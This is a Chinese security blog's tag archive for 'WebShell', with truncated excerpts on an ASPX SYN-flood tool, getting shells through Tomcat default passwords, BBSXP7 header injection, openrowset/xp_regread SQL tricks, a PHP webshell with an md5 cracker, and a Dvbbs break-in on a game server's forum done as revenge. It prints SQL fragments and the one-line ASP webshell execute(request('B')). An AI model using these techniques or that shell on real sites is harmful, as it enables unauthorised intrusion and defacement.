标签 ‘WebShell’ 下的日志

ASPX傀儡木乃伊(ASPX SYN DDOS)

鬼仔注:我未测试效果如何。

软件作者:kj021320
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:本文章首发I.S.T.O技术团队,后由原创作者友情提交到邪恶八进制信息安全团队论坛。

现在ASP的空间 90%都支持 .NET了
而且.NET上面实现的技术真可谓多啊~
这个也能给我想得出来!
拿虚拟空间来D人家是否会给人家BS -_-!
估计这个是我继JSPWEBSHELL之后又一大力作!
毕竟国内的.NET技术还不成熟,迟点推出另一款web工具必让大家叹为观止…..刀可以杀人可以防卫,以下代码大家慎用,后果自负


阅读全文 »

Tags:

Tomcat后台拿shell

总结下别人的经验
转载请注明:鬼仔 http://www.huaidan.org/blog

有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。
有两个目录可以访问:
/admin
/manager/html

/admin 目录下的利用:
Service–host–actions–Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai
然后直接http://ip/guizai 就可以看到c盘内容。

/manager/html 目录下的利用:
这里可以直接上传一个war文件(用于远程管理tomcat服务的脚本文件),来自动建 阅读全文 »

Tags: ,

BBSXP7 mssql版,从注入到拿WEBSHELL

鬼仔注:这个BBSXP的log注入在一月份发过,在 这里 ,不过当时那篇文章说的只是注入,但是没有写拿shell的方法,这篇的分析比较详细,拿shell的方法也不错。记录下。

来源:Sobiny's Blog

这个东西是去年前发现的了。好象内容细节在哪个杂志上发了。不过似乎杂志和作者都没跟我联系呢?不管,发了再说。
针对BBSXP7的,是HTTP头注入。
没有多大的看头,熟悉的朋友,请从后面拿SHELL的地方开始看。
反正看得懂的就看。
看不懂的请提问,不过希望大家问一点有水平的问题。
太基础的,GOOGLE上可以搜索到的问题,恕我不回答。

我们都知道
阅读全文 »

Tags: , , ,

突破SQL错误提示上传webshell

文章作者:疯狗 http://www.cnbct.org/

得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%[email protected]#[email protected]^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))–

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 阅读全文 »

Tags:

Shell I

又一个来自国外的phpshell,在milw0rm看到的。
关于为什么起这个名字,作者说:“Couldn't think of a name so it became "Shell I"…”
phpshell不稀奇了,介绍这个phpshell主要是他有一个比较有新意的功能:md5 cracker with custom options
可以直接在这个phpshell中利用当前网站服务器进行md5的暴力破解。

主要功能有(默认密码是login):

*File browser
*File editor
*File/directory deleter
*File/directory renamer
*File/directory chmodder
*File/directory creater

阅读全文 »

Tags:

渗透中用openrowset搞shell的方法

鬼仔注:老文章了,在xundi那里看到了,不知道作者是谁,但是看文章内容,貌似是疯狗写的。

得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%[email protected]#[email protected]^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))–

在对方执行 DECLARE @result varchar(255) exec 阅读全文 »

Tags: ,

dvbbs sql 得WebShell的分析报告

文/寒水芊芊
来源:水芊芊工作室

前言

  今天我朋友发来了个私服的官方网站.起因是因为这个私服的GM骗了我朋友100RMB.我朋友气愤之下找我帮忙.叫我篡改其web.哎.都怪平时太会吹牛了.无奈.把泡MM的时间挤一点去研究研究咯.活动活动..

WEB的分析

  私服的官方主页都是htm生成的.无从下手.难道要通过扫描服务器来实现入侵?突然发现在主页下有个论坛连接口.点进去.Powered By Dvbbs Version 7.1.0 Sp1 有门了.尝试着admin/admin888 data/dvbbs7.mdb 出现error.看来管理还不是个傻B.注册人数有1384个.怎么会用默认呢?怎么办呢?最近听说过有个dvbbs blog 阅读全文 »

Tags: ,

SQL_DIR 1.0 beat

来源:BIN-Blog

功能简介:

1.该程序主要针对非SA用户.
2.得到SQL账号密码,通过调用XP_dirtree扩展,对SQL数据库所在的服务器进行列目录操作.
3.即使没有建表的权限也可以使用该程序.
4.增加了自动备份SHELL的功能.
5.感谢Venomancer 提供的精神上的支持!smoke

注意:备份的SHELL是< %execute(request("B"))% >或者自行修改!

图片(1)

图片(2)

阅读全文 »

Tags: